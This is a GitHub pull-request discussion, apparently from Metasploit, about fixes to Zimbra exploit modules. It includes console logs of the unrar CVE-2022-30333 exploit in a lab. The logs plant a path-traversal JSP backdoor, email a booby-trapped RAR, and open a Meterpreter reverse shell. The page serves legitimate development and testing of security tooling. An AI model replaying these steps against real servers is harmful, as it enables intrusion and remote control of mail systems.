-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Zimbra fixes #17183
Zimbra fixes #17183
Conversation
…e generating artifacts if the server cannot be reached
@msjenkins-r7 test this please. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for these fixes @rbowes-r7! I just left one comment about using fail_with
instead of return
, otherwise, these changes looks good to me.
I found an issue that is likely not related to these changes but that might be fixed in this PR too. After emailing the payload (staged payload), the payload gets triggered and the first stager is sent. However, the second stage is never sent:
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > exploit verbose=true lhost=10.0.0.1 rhosts=10.0.0.30
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) >
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/xbiftax.jsp
[*] Checking the HTTP connection to the target
[+] payload.rar stored at /home/msfuser/.msf4/local/payload.rar
[+] File created! Email the file above to any user on the target Zimbra server
[*] Trying to trigger the backdoor @ public/xbiftax.jsp every 5s [backgrounding]...
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) >
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > sendemail -f myuser@mail.donotexistdomain.foo -t msfuser@mail.donotexistdomain.foo -u 'Hello' -m 'test foo' -s 10.0.0.30 -o tls=no -a /home/msfuser/.msf4/local/payload.rar
[*] exec: sendemail -f myuser@mail.donotexistdomain.foo -t msfuser@mail.donotexistdomain.foo -u 'Hello' -m 'test foo' -s 10.0.0.30 -o tls=no -a /home/msfuser/.msf4/local/payload.rar
Nov 08 12:15:24 n00tmeg-desktop sendemail[67687]: Email was sent successfully!
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) >
[*] Transmitting intermediate stager...(126 bytes)
[+] Successfully triggered the payload
[*] Sending stage (3045348 bytes) to 10.0.0.30
[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/xbiftax.jsp' on the target
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > jobs
Jobs
====
No active jobs.
It looks like the handler is closed prematurely.
If I starting a handler manually, it works:
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > use linux/x64/meterpreter/reverse_tcp
msf6 payload(linux/x64/meterpreter/reverse_tcp) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf6 payload(linux/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1
[*] Started reverse TCP handler on 10.0.0.1:4444
msf6 payload(linux/x64/meterpreter/reverse_tcp) >
msf6 payload(linux/x64/meterpreter/reverse_tcp) >
msf6 payload(linux/x64/meterpreter/reverse_tcp) >
msf6 payload(linux/x64/meterpreter/reverse_tcp) > previous
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > exploit verbose=true lhost=10.0.0.1 rhosts=10.0.0.30
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) >
[-] Handler failed to bind to 10.0.0.1:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/arjhjbwf.jsp
[*] Checking the HTTP connection to the target
[+] payload.rar stored at /home/msfuser/.msf4/local/payload.rar
[+] File created! Email the file above to any user on the target Zimbra server
[*] Trying to trigger the backdoor @ public/arjhjbwf.jsp every 5s [backgrounding]...
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > sendemail -f myuser@mail.donotexistdomain.foo -t msfuser@mail.donotexistdomain.foo -u 'Hello' -m 'test foo' -s 10.0.0.30 -o tls=no -a /home/msfuser/.msf4/local/payload.rar
[*] exec: sendemail -f myuser@mail.donotexistdomain.foo -t msfuser@mail.donotexistdomain.foo -u 'Hello' -m 'test foo' -s 10.0.0.30 -o tls=no -a /home/msfuser/.msf4/local/payload.rar
Nov 08 12:16:28 n00tmeg-desktop sendemail[67809]: Email was sent successfully!
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) >
[*] Sending stage (3045348 bytes) to 10.0.0.30
[+] Successfully triggered the payload
[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/arjhjbwf.jsp' on the target
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > [*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.30:47824) at 2022-11-08 12:16:29 +0100
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > sessions -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : mail.donotexistdomain.foo
OS : Ubuntu 18.04 (Linux 5.4.0-122-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: zimbra
I fixed the simple thing - return -> fail_with I think the issue was the handler closing here:
I changed it to set a variable and stop sending the HTTP request, but not stop the module (I made the same change to the cpio module as well). Not sure if there's a better way to "wait for shell", but this seems to work - a) it doesn't stop the module before getting the session, and b) it doesn't create multiple sessions by triggering the payload multiple times. LMK what you think! |
Thanks @rbowes-r7 ! This seems to have fixed the issue. I tested both modules and they work as expected. I just found the
|
Release NotesThis adds some small changes, cleanups and fixes to the |
These are a few small changes / cleanups to the Zimbra modules I wrote in the last couple months:
windows/
instead oflinux/
- my bad!)And this is what it looks like now: